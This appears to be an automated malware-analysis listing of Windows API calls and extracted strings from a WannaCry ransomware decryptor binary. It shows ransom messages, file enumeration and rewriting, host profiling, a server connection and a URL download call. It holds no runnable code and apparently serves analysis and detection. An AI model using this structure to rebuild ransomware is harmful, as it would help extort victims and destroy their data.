    • #1641.MFC42(00000000), ref: 00404E26
    • #3092.MFC42(00000403,00000000), ref: 00404E32
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
    • #3092.MFC42(00000001), ref: 00404E57
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
    • #3092.MFC42(00000002), ref: 00404E76
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
    APIs
      • Part of subcall function 00410A50: SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
      • Part of subcall function 00410A50: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
    • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00410AF0: ReadFile.KERNEL32(000000FF,00000404,ZA,00000404,00000000), ref: 00410B18
    • #825.MFC42(00000000), ref: 00411E84
    • _mbsstr.MSVCRT ref: 00411F04
    • _mbsstr.MSVCRT ref: 00411F1B
    • _mbsstr.MSVCRT ref: 00411F32
    • _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411B80: SystemTimeToFileTime.KERNEL32(?,?), ref: 00411BE6
    • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
    • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • strtok.MSVCRT ref: 0040BBA9
      • Part of subcall function 0040C7B0: #825.MFC42(?,00000000,0040BBD1,00000000,00000000,00000000), ref: 0040C7D7
      • Part of subcall function 0040C920: ?_Xlen@std@@YAXXZ.MSVCP60(00000001,?,0040BBE8,00000000,?,00000000,00000000,00000000), ref: 0040C92D
      • Part of subcall function 0040C800: #823.MFC42(00000018,00000000,00000000,00000001,?,0040BC08), ref: 0040C80F
    • strtok.MSVCRT ref: 0040BC22
    • #825.MFC42(?,?), ref: 0040BCDD
    • GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040BCEC
    • srand.MSVCRT ref: 0040BCF3
    • rand.MSVCRT ref: 0040BD09
      • Part of subcall function 0040CE50: #825.MFC42(?,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE6F
      • Part of subcall function 0040CE50: #825.MFC42(00000008,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE95
    • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
    • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8A3
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
    • #825.MFC42(?,?,?,?), ref: 0040BDED
    • #825.MFC42(?), ref: 0040BE7A
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C776
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C794
    APIs
    • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
    • #823.MFC42(00000001,?,?), ref: 00406DEC
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
    • _strnicmp.MSVCRT ref: 00406E3E
    • _strnicmp.MSVCRT ref: 00406E5A
    • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
    • #6136.MFC42 ref: 00406EC4
    • #825.MFC42(?), ref: 00406ED7
    APIs
    • wcscpy.MSVCRT ref: 0040257D
    • wcsrchr.MSVCRT ref: 0040258A
    • _wcsicmp.MSVCRT ref: 004025A5
    • _wcsicmp.MSVCRT ref: 004025B4
    • wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 004020A0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
      • Part of subcall function 004020A0: GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
      • Part of subcall function 004020A0: CloseHandle.KERNEL32(00000000), ref: 00402234
      • Part of subcall function 004020A0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
      • Part of subcall function 004020A0: SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
      • Part of subcall function 004020A0: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040230F
      • Part of subcall function 004020A0: ReadFile.KERNEL32(00000000,?,00100000,?,00000000), ref: 004023F3
      • Part of subcall function 004020A0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00402436
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402452
      • Part of subcall function 004020A0: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
      • Part of subcall function 004020A0: SetEndOfFile.KERNEL32(00000000), ref: 00402491
      • Part of subcall function 004020A0: SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
      • Part of subcall function 004020A0: CloseHandle.KERNEL32(00000000), ref: 004024BD
      • Part of subcall function 004020A0: MoveFileW.KERNEL32(?,?), ref: 004024DA
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402511
    • DeleteFileW.KERNEL32(?), ref: 004025F0
    • MoveFileW.KERNEL32(?,?), ref: 00402604
    • DeleteFileW.KERNEL32(?), ref: 0040262E
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
      • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
    • fopen.MSVCRT ref: 0040C46B
    • fwrite.MSVCRT ref: 0040C489
    • fclose.MSVCRT ref: 0040C48F
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
    APIs
    • __set_app_type.MSVCRT ref: 0041312F
    • __p__fmode.MSVCRT ref: 00413144
    • __p__commode.MSVCRT ref: 00413152
    • __setusermatherr.MSVCRT ref: 0041317E
      • Part of subcall function 004133B2: _controlfp.MSVCRT ref: 004133BC
    • _initterm.MSVCRT ref: 00413194
    • __getmainargs.MSVCRT ref: 004131B7
    • _initterm.MSVCRT ref: 004131C7
    • GetStartupInfoA.KERNEL32(?), ref: 00413206
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0041322A
      • Part of subcall function 004133E6: #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
    • exit.MSVCRT ref: 0041323A
    • _XcptFilter.MSVCRT ref: 0041324C
    APIs
    • wcscat.MSVCRT ref: 00401CC1
    • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
    • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
    • RegQueryValueExA.ADVAPI32 ref: 00401D81
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
    • RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    APIs
    • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
    • GetParent.USER32(?), ref: 004042BB
    • #2864.MFC42(00000000), ref: 004042C2
    • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
    • #2379.MFC42 ref: 004042DD
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
    • #2379.MFC42(?), ref: 004042FF
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    APIs
      • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
      • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
      • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
      • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
      • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
      • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
    • sprintf.MSVCRT ref: 0040397A
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
      • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
      • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
      • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
    • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
      • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00403AF0: fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00403AF0: fclose.MSVCRT ref: 00403C62
    • CloseHandle.KERNEL32(?), ref: 004039F1
    Strings
    • All your files have been decrypted!, xrefs: 004039C3
    • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
    • %08X.dky, xrefs: 00403969
    APIs
    • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
    • #860.MFC42(00421798), ref: 004040F6
    • #858.MFC42(00000000,00421798), ref: 004040FE
    • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
    • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
    APIs
      • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    • #2514.MFC42 ref: 00407CE5
    • #2414.MFC42 ref: 00407D1A
    • #2414.MFC42 ref: 00407D4F
    • #616.MFC42 ref: 00407D6E
    • #693.MFC42 ref: 00407D7F
    • #641.MFC42 ref: 00407D93
    APIs
    • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
    • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
    • GetSysColor.USER32 ref: 0040861D
    • GetSysColor.USER32(00000009), ref: 00408624
    • GetSysColor.USER32(00000012), ref: 0040862B
    • GetSysColor.USER32(00000002), ref: 00408632
    • SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
    • GetSysColor.USER32(0000001B), ref: 0040865C
    • #6140.MFC42(00000002,000000FF), ref: 00408667
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    APIs
    • CreateProcessA.KERNEL32 ref: 00401AE3
    • WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
    • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
    • CloseHandle.KERNEL32(?), ref: 00401B31
    • CloseHandle.KERNEL32(?), ref: 00401B38
    APIs
    • #4710.MFC42 ref: 00401145
    • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
    • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
    • #537.MFC42(Connecting to server...), ref: 0040118D
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
    • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
    Strings
    • Connecting to server..., xrefs: 00401188
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040ADC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
      • Part of subcall function 0040ADC0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B0C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
      • Part of subcall function 0040B0C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    APIs
    • OpenClipboard.USER32(?), ref: 00407C38
    • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
    • CloseClipboard.USER32 ref: 00407C5B
    • EmptyClipboard.USER32 ref: 00407C66
    • GlobalLock.KERNEL32(00000000), ref: 00407C79
    • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
    • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
    • CloseClipboard.USER32 ref: 00407CA1
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
    APIs
    • fopen.MSVCRT ref: 00407FBD
    • fread.MSVCRT ref: 00407FDD
    • fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    APIs
    • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
    • KillTimer.USER32(?,000003E9), ref: 0040125E
    • #4853.MFC42 ref: 00401266
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
    • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
    • #2379.MFC42 ref: 004012C4
    APIs
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
    • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
    • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
    Strings
    • Please select a host to decrypt., xrefs: 00403885
    APIs
    • GetParent.USER32(?), ref: 004044D2
    • #2864.MFC42(00000000), ref: 004044D9
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
    • #2860.MFC42(00000000), ref: 004044EF
    • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
    • CreateFontIndirectA.GDI32(?), ref: 00404513
    • #1641.MFC42(00000000), ref: 0040451D
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
    APIs
    • #3797.MFC42 ref: 00409C27
    • #6734.MFC42(?,?), ref: 00409C4E
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
    • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
    • #4284.MFC42(00000000,00004000,00000000,?,?), ref: 00409CDD
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00409CF0
    APIs
    • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
    • #823.MFC42(?,?,?), ref: 00412849
      • Part of subcall function 00411C00: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,?,?,00000000,0041289D), ref: 00411C27
      • Part of subcall function 00411C00: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00411C87
    • #825.MFC42(?), ref: 004128B5
    • #825.MFC42(?), ref: 004128CE
    • #825.MFC42(00000000), ref: 004128DD
    • #823.MFC42(00000008), ref: 004128FA
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000428), ref: 0040B793
    • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
    • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
    • DeleteFileA.KERNEL32(?), ref: 0040B815
    • DeleteFileA.KERNEL32(?), ref: 0040B82C
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    APIs
    • OffsetRect.USER32(?,?,?), ref: 00409A9B
    • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
    • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
    • #5781.MFC42(0041679C,00000000), ref: 00409ACC
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
    APIs
    • #470.MFC42(?,00000000), ref: 0040433F
    • #5789.MFC42 ref: 00404354
    • #5875.MFC42(00000001), ref: 00404361
    • #6172.MFC42(?,00000001), ref: 0040436E
    • #5789.MFC42(00000000), ref: 0040438F
    • #755.MFC42(00000000), ref: 004043A0
      • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
      • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
      • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
      • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
      • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
      • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
      • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
    APIs
    • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
    • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
    • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
    • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
    • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
    • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    APIs
    • GetLogicalDrives.KERNEL32 ref: 00403A35
    • GetDriveTypeW.KERNEL32 ref: 00403A7A
    • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
      • Part of subcall function 004026B0: swprintf.MSVCRT ref: 00402728
      • Part of subcall function 004026B0: FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027E1
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027FB
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
      • Part of subcall function 004026B0: GetFileAttributesW.KERNEL32(?), ref: 00402830
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 0040286E
      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028C3
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028DD
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028F3
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 00402914
      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 004026B0: FindNextFileW.KERNEL32(?,?), ref: 0040296A
      • Part of subcall function 004026B0: FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
      • Part of subcall function 004026B0: DeleteFileW.KERNEL32(?), ref: 00402A16
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
      • Part of subcall function 004026B0: DeleteFileW.KERNEL32(?), ref: 00402A36
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402A6B
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402ABF
    APIs
    • #823.MFC42(?), ref: 00406F15
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
    • #825.MFC42(?), ref: 00406F62
    APIs
    • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    APIs
    • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
    • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
    • #860.MFC42(00421798), ref: 00404CAD
    APIs
    • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
    • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
    • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
    APIs
    • #289.MFC42 ref: 0040455F
    • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
    • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
    • #613.MFC42 ref: 004045BB
    APIs
    • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
    • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767AAD28), ref: 00406D39
    • SendMessageA.USER32 ref: 00406D69
    • #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
      • Part of subcall function 00406DC0: #823.MFC42(00000001,?,?), ref: 00406DEC
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E3E
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E5A
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
